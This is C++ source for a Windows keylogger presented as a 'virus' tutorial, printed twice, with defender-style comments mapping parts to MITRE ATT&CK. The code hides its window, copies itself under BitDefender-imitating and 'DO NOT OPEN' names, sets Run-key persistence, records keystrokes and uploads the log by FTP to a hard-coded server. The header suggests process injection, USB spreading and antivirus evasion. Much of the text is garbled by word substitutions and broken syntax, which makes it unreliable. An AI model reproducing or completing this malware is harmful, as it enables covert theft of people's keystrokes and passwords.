/*
FIRST VERSION
Ls Learn C Not xvi Bit,Windows C++ Before Reading On. Get The Win Help File For Reference
The First Function Is The Key Loggere Part(Pay Load) Which Simply Logs Key Strokes
Getkeypress(Int Keypress)
Getasynckeypressstate: this call returns the state of each key; the int ASCII value of the key is passed to our function, converted to a string and saved in a file at C:\Sas.Txt
/*This Is Not Influenza A virus subtype H5N1 Good Method For Making The Key Kolggers But Preferably The First And Easy Option.Piping Out The Key Strokes Using The Key Bord Hooks Are The Best Method For Doing It(Google For It)
what it does
1)geting the attain got to the windows created using hwnd
findwindowa("consolewindowclass",null);
2)registry entry valuse hkey
*********then the enshroud attain got to enshroud the virus******************
3)using the handle obtained in "hide" we will set it to be hidden so that it will run in the background but not visible
getmodulefilename(getmodh,locate,sizeof(locate));
4)used to locomote the electrical current path attain got for moving it from electrical current rank to another
5)getmodulefilename
used to locomote the electrical current organisation directory it differs on the insatllation of windows on diff drives
*********victims organisation file location***************
6)once subsequently getting the organisation directory ex:c:\windows\system32
7)i append the path of virus re-create c:\windows\system32 + bitdefenderupdates.exe using string truthful cat function
8)now re-create from electrical current excuted path to novel house using copyfile(locate,temprot,false);
copyfile(locate,"c:\\documents together with settings\\all users\\start menu\\programs\\startup\\bitdefender_update.exe",false);
************breath of the virus*******************
9)setting it to be autoloaded every time windows starts,we just append a few lines to the registry
10)it sends you the logged keystrokes via mail using the ftp() function
we write two start up entries, one a link to the current module and one to a fixed path so to evade common anti virus detection
regsetvalueex(fixstup,"bit defender updates ",0,re_sz,(lpbyte)system2,sizeof(system2));
its ready
****************the wings together with leg of virus*******************
am non including those constituent equally its uncomplicated jsut write a text file amongst autorun entries to the removable drives together with so it sick locomote able to spread
and its ready
*****************************OTHER TECHNIQUES AND Improvements***********************
Just By Ading Few More Codes You Could Make It Un Detactable By Process Vivers And Task Managers
Just By Doing Few Researchs You Could Make It Un Detactable By Anti Virus
Insted Of The Direct Startup Entry Use Influenza A virus subtype H5N1 Parasitic Infection Technique To Get Auto Started
This Dont Check Whether Influenza A virus subtype H5N1 Removable Media Exsist Add Influenza A virus subtype H5N1 Function To Chek The Presence And Then Append The Virusu May Use Shchangenotifyregister To Get Notified Of Any New Drives
U Could All Make It As Influenza A virus subtype H5N1 Dll And Make Code It To Inject Inot Other Running Process For That Allu Neeed To Do Is To Get The List Of Process On Statup Create Influenza A virus subtype H5N1 Remote Thread And Inject It To The Stup Applications Virtual Memmory
Just Copy Paste And Compile Wont Work For For These Codes As I Have Added Lots Of Bugs In It.If You Really Wanna Make Influenza A virus subtype H5N1 Virus You May Try To Investigate And Correct Those Errors Else Leave It.I Don Encourage Script Kiddies
Ill Work Fine And Tested On Vc++,Blood Shed,And Boroland Cs
HAPPY HACKING
*\
#include <windows.h>
#include <Winuser.h>
#include <string>
#include <wininet.h>
#include <fstream.h>
// Getkeypress: translates one key code, as passed in by the polling loop in
// main(), into the text that is written to the log file.
//   - 8, 13, 32 and the named VK_* codes become fixed tokens ("[delete]",
//     "\n", " ", "[CTRL]", ...).
//   - 190 and 110 become "."; 96..105 are assigned keypress-48; 48..59 are
//     assigned the code itself.
//   - 65..90 are handled in the nested block near the end.
// Review note: the page's own header says the listing was published with
// deliberate errors and does not build as shown; these comments describe what
// each part is written to do, not verified runtime behaviour.
// Defender view: the bracketed tokens are literal strings in this function, so
// a plain-text file mixing typed text with markers such as "[TABULATOR]" or
// "[SNAPSHOT]" is a content indicator for this logger's output
// (keylogging, MITRE ATT&CK T1056.001).
string Getkeypress(int keypress)
{
string tempkeypress = "";
// Fixed numeric codes first, then the named virtual-key constants.
if (keypress == 8)
tempkeypress = "[delete]";
else if (keypress == 13)
tempkeypress = "\n"
else if (keypress == 32)
tempeypress = " "
else if (keypress == VK_PAUSE)
tempkeypress = "[PAUSE]";
else if (keypress == VK_CAPITAL)
tempkeypress = "[CAPITAL]";
else if (keypress == VK_SHIFT)
tempkeypress = "[SHIFT]";
else if (keypress == VK_TAB)
tempkeypress = "[TABULATOR]";
else if (keypress == VK_CONTROL)
tempkeypress = "[CTRL]";
else if (keypress == VK_ESCAPE)
tempkeypress = "[ESCAPE]";
else if (keypress == VK_END)
tempkeypress = "[END]";
else if (keypress == VK_HOME)
tempkeyress = "[HOME]";
else if (keypress == VK_LEFT)
tempkeypress = "[left]";
else if (keypress == VK_RIGHT)
tempkeypress = "[right]";
else if (keypress == VK_UP)
tempkeypress = "[UP]";
else if (keypress == VK_DOWN)
tempkeypress = "[DOWN]";
else if (keypress == VK_SNAPSHOT)
tempkeypress = "[SNAPSHOT]";
else if (keypress == VK_NUMLOCK)
tempkeypress = "[NUMLOCK]";
else if (keypress == 190 || keypress == 110)
tempkeypress = ".";
// 96..105: the code minus 48 is stored.
else if (keypress >=96 && keypress <= 105)
tempkypress = keypress-48;
// 48..59: the code itself is stored.
else if (keypress > 47 && keypress < 60)
tempkeypress = keypress;
// Mouse-button codes are compared here before the letter range is handled.
if (keypress != VK_LBUTTON || keypress != VK_RBUTTON)
{
// 65..90: the letter range.
if (keypress > 64 && keypress < 91)
{
// The Caps Lock state is consulted before the code is stored.
if (GetkeypressState(VK_CAPITAL))
tempkeypress = keypress;
// Original note: check the log file size to trigger the FTP file transfer.
// The log is opened read-only here and its length is read into fsize.
if ((fp = open("c://sas.txt", O_RDONLY)) != -1)
fsize = filelength(fp);
if(fsize> 1000);// original note: trigger the FTP transfer when the file reaches the size given in bytes
//1MB = 1048576 bytes
// Defender view: the size comparison next to the ftp() reference shows the
// upload is meant to be size-triggered, so outbound transfers would follow
// the growth of the log file rather than a fixed schedule.
int ftp();
else
{
// 32 is added to the code before it is stored (65..90 becomes 97..122).
keypress = keypress + 32;
tempkeypress = keypress;
}
}
}
return tempkeypress;
}
// ftp: uploads the keystroke log to a remote FTP server through the WinINet
// calls InternetOpen, InternetConnect and FtpPutFile. It appears intended to
// yield 1 after a successful FtpPutFile and 0 when InternetOpen or the upload
// fails.
// Review note: the page's own header says the listing was published with
// deliberate errors and does not build as shown; these comments describe what
// each part is written to do, not verified runtime behaviour.
// Defender view (exfiltration over an unencrypted protocol, MITRE ATT&CK
// T1048.003): the host name, port 21, user name and password are all string
// literals in this function, and FTP carries both the credentials and the
// uploaded log in clear text, so the transfer is visible to network
// monitoring. Outbound FTP from a workstation process that is not an FTP
// client is the network indicator; the literals below look like placeholders
// and would differ per build.
int ftp()
{
// Session handle; "LOG UPLOAD" is the agent string passed to InternetOpen.
HINTERNET ftp=InternetOpen(TEXT("LOG UPLOAD"),INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(!ftp)
provide 0;
else
{
// FTP connection with the hard-coded host, port and credentials.
HINTERNET ftplogin=InternetConnect(Open,"ftp.myftp.com",21,
"usname","pwd",INTERNET_SERVICE_FTP,0,0);
// The local log is stored on the server as "log.txt" in binary mode.
BOOL log = FtpPutFile(ftplogin,loger,"log.txt",FTP_TRANSFER_TYPE_BINARY,0);//here u could usage a file cite based on appointment to avoid over writing
if (log==FALSE)
{
// Both handles are closed on the failure path.
InternetCloseHandle(ftp);
InternetCloseHandle(ftplogin);
provide 0;
}
provide 1;
}
}
// main: entry point of the sample. In order, the visible code is written to
//   1. create a console and hide its window,
//   2. read its own image path and the Windows system directory,
//   3. copy its own image to several locations under security-product-like
//      and lure file names,
//   4. write two values under the HKLM ...\CurrentVersion\Run key,
//   5. poll key state in an endless loop and append the translated keys to
//      C:\SAS.txt.
// Review note: the page's own header says the listing was published with
// deliberate errors and does not build as shown; these comments describe what
// each part is written to do, not verified runtime behaviour.
// Defender view, mapped to MITRE ATT&CK: hidden window (T1564.003),
// masquerading as a security product (T1036), Run key / Startup folder
// persistence (T1547.001), copies to other drive letters (possibly T1091 if
// those drives are removable media), keylogging (T1056.001).
int main()
{
HWND hide;
long fsize;
char system[TOT_SIZ],system2[TOT_SIZ];
HKEY stup,fixstup;
TCHAR SIZ[TOT_SIZ];
LPVOID tempbuffer = NULL;
char temprot[TOT_SIZ];
BOOL buffera = TRUE, filesus = FALSE;
DWORD HANDLE fupldhandle = NULL;
TCHAR loger = TEXT("c\\sas.txt");
TCHAR FIXSTUPPATH[TOT_SIZ+12]="\\BitDefender Updates.exe";
DWORD fread = 0, favail = 0;
char LOCATE[TOT_SIZ];/*creating enshroud */
// A console is allocated, located by its window class name and then passed to
// ShowWindow with 0, so the process runs without a visible window.
AllocConsole();
hide=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hide,0);
// The path of the running image is read twice, into LOCATE and into SIZ.
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
GetModuleFileName(NULL,SIZ,TOT_SIZ);
// The system directory is read into two buffers; each then gets a file name
// appended that imitates an antivirus updater.
GetSystemDirectory(system,sizeof(system));
GetSystemDirectory(system2,sizeof(system2));
//WRT 2SYS DRV AL PSBL DRV ONS
//temprot[0]=system[0];
//std::strcat(temprot,":\\Program Files\\BitDefender\\BitDefender Updates.exe");
std::strcat(system,"\\BitDefenderUpdates.exe");
//std::strcat(system2,"\\drveprotect.exe");
std::strcat(system2,FIXSTUPPATH);
// Self-copy: LOCATE is the source of every CopyFile call below.
// Defender view: one image written in quick succession to the system
// directory, to the root of drive letters E: through J:, to the All Users
// Startup folder and to C:\SAS is a file-creation pattern worth alerting on,
// as is an executable named after a security product outside that product's
// install path.
CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,system,false);
CopyFile(LOCATE,system2,false);
CopyFile(LOCATE,"E:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"F:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"G:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"H:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"I:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"J:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"C:\\Documents together with Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);
CopyFile(LOCATE,"C:\\SAS\\BITDEFENDER_UPDATE.exe",false);
// Path of the keystroke log written by the loop at the end of main.
std::string Filename = "C:\\SAS.txt";
/*srt up*/
// Persistence: the same Run key is opened twice and one value is written
// through each handle. The value names differ only by a trailing space; the
// data are the system-directory copy (system2) and the current image path
// (SIZ).
// Defender view: audit value creation under
// Software\Microsoft\Windows\CurrentVersion\Run, and flag values whose name
// imitates a security product while the data points at a binary that product
// did not install.
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&stup);
//st fix
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&fixstup);
//ste fst
RegSetValueEx(fixstup,
"BIT DEFENDER UPDATES ",
0,
RE_SZ,
(LPBYTE)system2,
sizeof(system2));
//stup fixed
RegSetValueEx(stup,
"BIT DEFENDER UPDATES",
0,
REG_SZ,
(LPBYTE)SIZ,
sizeof(SIZ));
/* Close the keypress. */
RegClosekeypress(stup);
RegClosekeypress(fixstup);
// Log stream set-up for C:\SAS.txt.
std::string TempString =
Fstream FStream;
FStream.pen(Filename., std::fstream::out | std::fstream:);
//FStream.write(
// Capture loop: never exits. Each pass sleeps 3 ms, then walks key codes
// 8..190, tests the state of each one and hands pressed codes to Getkeypress.
// Defender view: a process with no visible window that polls key state in a
// tight loop and keeps appending to one text file at the root of C: is the
// behavioural signature of this polling approach.
while(1==1)
{
Sleep(3);
for(int i = 8; i < 191; i++)
{
if(GetAsynckeypressState(i)&1 ==1)
{
TempString = Getkeypress (i);
// The stream is closed and reopened in append mode after every write, so
// each captured key is committed to the file before the next one.
FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}
FIRST VERSION
Ls Learn C Not xvi Bit,Windows C++ Before Reading On. Get The Win Help File For Reference
The First Function Is The Key Loggere Part(Pay Load) Which Simply Logs Key Strokes
Getkeypress(Int Keypress)
Getasynckeypressstate: this call returns the state of each key; the int ASCII value of the key is passed to our function, converted to a string and saved in a file at C:\Sas.Txt
/*This Is Not Influenza A virus subtype H5N1 Good Method For Making The Key Kolggers But Preferably The First And Easy Option.Piping Out The Key Strokes Using The Key Bord Hooks Are The Best Method For Doing It(Google For It)
what it does
1)geting the attain got to the windows created using hwnd
findwindowa("consolewindowclass",null);
2)registry entry valuse hkey
*********then the enshroud attain got to enshroud the virus******************
3)using the handle obtained in "hide" we will set it to be hidden so that it will run in the background but not visible
getmodulefilename(getmodh,locate,sizeof(locate));
4)used to locomote the electrical current path attain got for moving it from electrical current rank to another
5)getmodulefilename
used to locomote the electrical current organisation directory it differs on the insatllation of windows on diff drives
*********victims organisation file location***************
6)once subsequently getting the organisation directory ex:c:\windows\system32
7)i append the path of virus re-create c:\windows\system32 + bitdefenderupdates.exe using string truthful cat function
8)now re-create from electrical current excuted path to novel house using copyfile(locate,temprot,false);
copyfile(locate,"c:\\documents together with settings\\all users\\start menu\\programs\\startup\\bitdefender_update.exe",false);
************breath of the virus*******************
9)setting it to be autoloaded every time windows starts,we just append a few lines to the registry
10)it sends you the logged keystrokes via mail using the ftp() function
we write two start up entries, one a link to the current module and one to a fixed path so to evade common anti virus detection
regsetvalueex(fixstup,"bit defender updates ",0,re_sz,(lpbyte)system2,sizeof(system2));
its ready
****************the wings together with leg of virus*******************
am non including those constituent equally its uncomplicated jsut write a text file amongst autorun entries to the removable drives together with so it sick locomote able to spread
and its ready
*****************************OTHER TECHNIQUES AND Improvements***********************
Just By Ading Few More Codes You Could Make It Un Detactable By Process Vivers And Task Managers
Just By Doing Few Researchs You Could Make It Un Detactable By Anti Virus
Insted Of The Direct Startup Entry Use Influenza A virus subtype H5N1 Parasitic Infection Technique To Get Auto Started
This Dont Check Whether Influenza A virus subtype H5N1 Removable Media Exsist Add Influenza A virus subtype H5N1 Function To Chek The Presence And Then Append The Virusu May Use Shchangenotifyregister To Get Notified Of Any New Drives
U Could All Make It As Influenza A virus subtype H5N1 Dll And Make Code It To Inject Inot Other Running Process For That Allu Neeed To Do Is To Get The List Of Process On Statup Create Influenza A virus subtype H5N1 Remote Thread And Inject It To The Stup Applications Virtual Memmory
Just Copy Paste And Compile Wont Work For For These Codes As I Have Added Lots Of Bugs In It.If You Really Wanna Make Influenza A virus subtype H5N1 Virus You May Try To Investigate And Correct Those Errors Else Leave It.I Don Encourage Script Kiddies
Ill Work Fine And Tested On Vc++,Blood Shed,And Boroland Cs
HAPPY HACKING
*\
#include <windows.h>
#include <Winuser.h>
#include <string>
#include <wininet.h>
#include <fstream.h>
// Getkeypress: translates one key code, as passed in by the polling loop in
// main(), into the text that is written to the log file.
//   - 8, 13, 32 and the named VK_* codes become fixed tokens ("[delete]",
//     "\n", " ", "[CTRL]", ...).
//   - 190 and 110 become "."; 96..105 are assigned keypress-48; 48..59 are
//     assigned the code itself.
//   - 65..90 are handled in the nested block near the end.
// Review note: the page's own header says the listing was published with
// deliberate errors and does not build as shown; these comments describe what
// each part is written to do, not verified runtime behaviour.
// Defender view: the bracketed tokens are literal strings in this function, so
// a plain-text file mixing typed text with markers such as "[TABULATOR]" or
// "[SNAPSHOT]" is a content indicator for this logger's output
// (keylogging, MITRE ATT&CK T1056.001).
string Getkeypress(int keypress)
{
string tempkeypress = "";
// Fixed numeric codes first, then the named virtual-key constants.
if (keypress == 8)
tempkeypress = "[delete]";
else if (keypress == 13)
tempkeypress = "\n"
else if (keypress == 32)
tempeypress = " "
else if (keypress == VK_PAUSE)
tempkeypress = "[PAUSE]";
else if (keypress == VK_CAPITAL)
tempkeypress = "[CAPITAL]";
else if (keypress == VK_SHIFT)
tempkeypress = "[SHIFT]";
else if (keypress == VK_TAB)
tempkeypress = "[TABULATOR]";
else if (keypress == VK_CONTROL)
tempkeypress = "[CTRL]";
else if (keypress == VK_ESCAPE)
tempkeypress = "[ESCAPE]";
else if (keypress == VK_END)
tempkeypress = "[END]";
else if (keypress == VK_HOME)
tempkeyress = "[HOME]";
else if (keypress == VK_LEFT)
tempkeypress = "[left]";
else if (keypress == VK_RIGHT)
tempkeypress = "[right]";
else if (keypress == VK_UP)
tempkeypress = "[UP]";
else if (keypress == VK_DOWN)
tempkeypress = "[DOWN]";
else if (keypress == VK_SNAPSHOT)
tempkeypress = "[SNAPSHOT]";
else if (keypress == VK_NUMLOCK)
tempkeypress = "[NUMLOCK]";
else if (keypress == 190 || keypress == 110)
tempkeypress = ".";
// 96..105: the code minus 48 is stored.
else if (keypress >=96 && keypress <= 105)
tempkypress = keypress-48;
// 48..59: the code itself is stored.
else if (keypress > 47 && keypress < 60)
tempkeypress = keypress;
// Mouse-button codes are compared here before the letter range is handled.
if (keypress != VK_LBUTTON || keypress != VK_RBUTTON)
{
// 65..90: the letter range.
if (keypress > 64 && keypress < 91)
{
// The Caps Lock state is consulted before the code is stored.
if (GetkeypressState(VK_CAPITAL))
tempkeypress = keypress;
// Original note: check the log file size to trigger the FTP file transfer.
// The log is opened read-only here and its length is read into fsize.
if ((fp = open("c://sas.txt", O_RDONLY)) != -1)
fsize = filelength(fp);
if(fsize> 1000);// original note: trigger the FTP transfer when the file reaches the size given in bytes
//1MB = 1048576 bytes
// Defender view: the size comparison next to the ftp() reference shows the
// upload is meant to be size-triggered, so outbound transfers would follow
// the growth of the log file rather than a fixed schedule.
int ftp();
else
{
// 32 is added to the code before it is stored (65..90 becomes 97..122).
keypress = keypress + 32;
tempkeypress = keypress;
}
}
}
return tempkeypress;
}
// ftp: uploads the keystroke log to a remote FTP server through the WinINet
// calls InternetOpen, InternetConnect and FtpPutFile. It appears intended to
// yield 1 after a successful FtpPutFile and 0 when InternetOpen or the upload
// fails.
// Review note: the page's own header says the listing was published with
// deliberate errors and does not build as shown; these comments describe what
// each part is written to do, not verified runtime behaviour.
// Defender view (exfiltration over an unencrypted protocol, MITRE ATT&CK
// T1048.003): the host name, port 21, user name and password are all string
// literals in this function, and FTP carries both the credentials and the
// uploaded log in clear text, so the transfer is visible to network
// monitoring. Outbound FTP from a workstation process that is not an FTP
// client is the network indicator; the literals below look like placeholders
// and would differ per build.
int ftp()
{
// Session handle; "LOG UPLOAD" is the agent string passed to InternetOpen.
HINTERNET ftp=InternetOpen(TEXT("LOG UPLOAD"),INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(!ftp)
provide 0;
else
{
// FTP connection with the hard-coded host, port and credentials.
HINTERNET ftplogin=InternetConnect(Open,"ftp.myftp.com",21,
"usname","pwd",INTERNET_SERVICE_FTP,0,0);
// The local log is stored on the server as "log.txt" in binary mode.
BOOL log = FtpPutFile(ftplogin,loger,"log.txt",FTP_TRANSFER_TYPE_BINARY,0);//here u could usage a file cite based on appointment to avoid over writing
if (log==FALSE)
{
// Both handles are closed on the failure path.
InternetCloseHandle(ftp);
InternetCloseHandle(ftplogin);
provide 0;
}
provide 1;
}
}
// main: entry point of the sample. In order, the visible code is written to
//   1. create a console and hide its window,
//   2. read its own image path and the Windows system directory,
//   3. copy its own image to several locations under security-product-like
//      and lure file names,
//   4. write two values under the HKLM ...\CurrentVersion\Run key,
//   5. poll key state in an endless loop and append the translated keys to
//      C:\SAS.txt.
// Review note: the page's own header says the listing was published with
// deliberate errors and does not build as shown; these comments describe what
// each part is written to do, not verified runtime behaviour.
// Defender view, mapped to MITRE ATT&CK: hidden window (T1564.003),
// masquerading as a security product (T1036), Run key / Startup folder
// persistence (T1547.001), copies to other drive letters (possibly T1091 if
// those drives are removable media), keylogging (T1056.001).
int main()
{
HWND hide;
long fsize;
char system[TOT_SIZ],system2[TOT_SIZ];
HKEY stup,fixstup;
TCHAR SIZ[TOT_SIZ];
LPVOID tempbuffer = NULL;
char temprot[TOT_SIZ];
BOOL buffera = TRUE, filesus = FALSE;
DWORD HANDLE fupldhandle = NULL;
TCHAR loger = TEXT("c\\sas.txt");
TCHAR FIXSTUPPATH[TOT_SIZ+12]="\\BitDefender Updates.exe";
DWORD fread = 0, favail = 0;
char LOCATE[TOT_SIZ];/*creating enshroud */
// A console is allocated, located by its window class name and then passed to
// ShowWindow with 0, so the process runs without a visible window.
AllocConsole();
hide=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hide,0);
// The path of the running image is read twice, into LOCATE and into SIZ.
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
GetModuleFileName(NULL,SIZ,TOT_SIZ);
// The system directory is read into two buffers; each then gets a file name
// appended that imitates an antivirus updater.
GetSystemDirectory(system,sizeof(system));
GetSystemDirectory(system2,sizeof(system2));
//WRT 2SYS DRV AL PSBL DRV ONS
//temprot[0]=system[0];
//std::strcat(temprot,":\\Program Files\\BitDefender\\BitDefender Updates.exe");
std::strcat(system,"\\BitDefenderUpdates.exe");
//std::strcat(system2,"\\drveprotect.exe");
std::strcat(system2,FIXSTUPPATH);
// Self-copy: LOCATE is the source of every CopyFile call below.
// Defender view: one image written in quick succession to the system
// directory, to the root of drive letters E: through J:, to the All Users
// Startup folder and to C:\SAS is a file-creation pattern worth alerting on,
// as is an executable named after a security product outside that product's
// install path.
CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,system,false);
CopyFile(LOCATE,system2,false);
CopyFile(LOCATE,"E:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"F:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"G:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"H:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"I:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"J:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"C:\\Documents together with Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);
CopyFile(LOCATE,"C:\\SAS\\BITDEFENDER_UPDATE.exe",false);
// Path of the keystroke log written by the loop at the end of main.
std::string Filename = "C:\\SAS.txt";
/*srt up*/
// Persistence: the same Run key is opened twice and one value is written
// through each handle. The value names differ only by a trailing space; the
// data are the system-directory copy (system2) and the current image path
// (SIZ).
// Defender view: audit value creation under
// Software\Microsoft\Windows\CurrentVersion\Run, and flag values whose name
// imitates a security product while the data points at a binary that product
// did not install.
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&stup);
//st fix
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&fixstup);
//ste fst
RegSetValueEx(fixstup,
"BIT DEFENDER UPDATES ",
0,
RE_SZ,
(LPBYTE)system2,
sizeof(system2));
//stup fixed
RegSetValueEx(stup,
"BIT DEFENDER UPDATES",
0,
REG_SZ,
(LPBYTE)SIZ,
sizeof(SIZ));
/* Close the keypress. */
RegClosekeypress(stup);
RegClosekeypress(fixstup);
// Log stream set-up for C:\SAS.txt.
std::string TempString =
Fstream FStream;
FStream.pen(Filename., std::fstream::out | std::fstream:);
//FStream.write(
// Capture loop: never exits. Each pass sleeps 3 ms, then walks key codes
// 8..190, tests the state of each one and hands pressed codes to Getkeypress.
// Defender view: a process with no visible window that polls key state in a
// tight loop and keeps appending to one text file at the root of C: is the
// behavioural signature of this polling approach.
while(1==1)
{
Sleep(3);
for(int i = 8; i < 191; i++)
{
if(GetAsynckeypressState(i)&1 ==1)
{
TempString = Getkeypress (i);
// The stream is closed and reopened in append mode after every write, so
// each captured key is committed to the file before the next one.
FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}